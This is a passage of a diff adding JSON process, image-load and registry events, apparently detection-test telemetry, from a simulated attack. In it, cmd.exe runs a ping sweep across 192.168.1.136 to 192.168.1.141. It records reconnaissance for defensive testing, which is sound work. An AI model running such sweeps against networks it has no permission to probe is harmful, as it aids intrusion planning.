"ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572642140000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "event_type": "process", + "pid": 5052, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572646830000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-0010E6D95201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.136", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 5316, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572646980000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572649330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572649330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883572649330000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "process", + "pid": 5316, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572651830000, + "unique_pid": "{42FC7E13-CB90-5C05-0000-001059DC5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.137", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6876, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572651980000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "event_type": "process", + "pid": 6876, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572656990000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-00102DE05201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.138", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6848, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572657130000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657140000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657300000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657300000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572657300000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "event_type": "process", + "pid": 6848, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572661840000, + "unique_pid": "{42FC7E13-CB91-5C05-0000-0010ACE25201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.139", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3956, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572661980000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "event_type": "process", + "pid": 3956, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572666990000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-001003E75201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.140", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3960, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572667130000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667140000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572667300000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "event_type": "process", + "pid": 3960, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572671830000, + "unique_pid": "{42FC7E13-CB92-5C05-0000-0010F4E95201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.141", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 8164, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 8164, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572671980000, + "unique_pid": "{42FC7E13-CB93-5C05-0000-00106AEC5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": 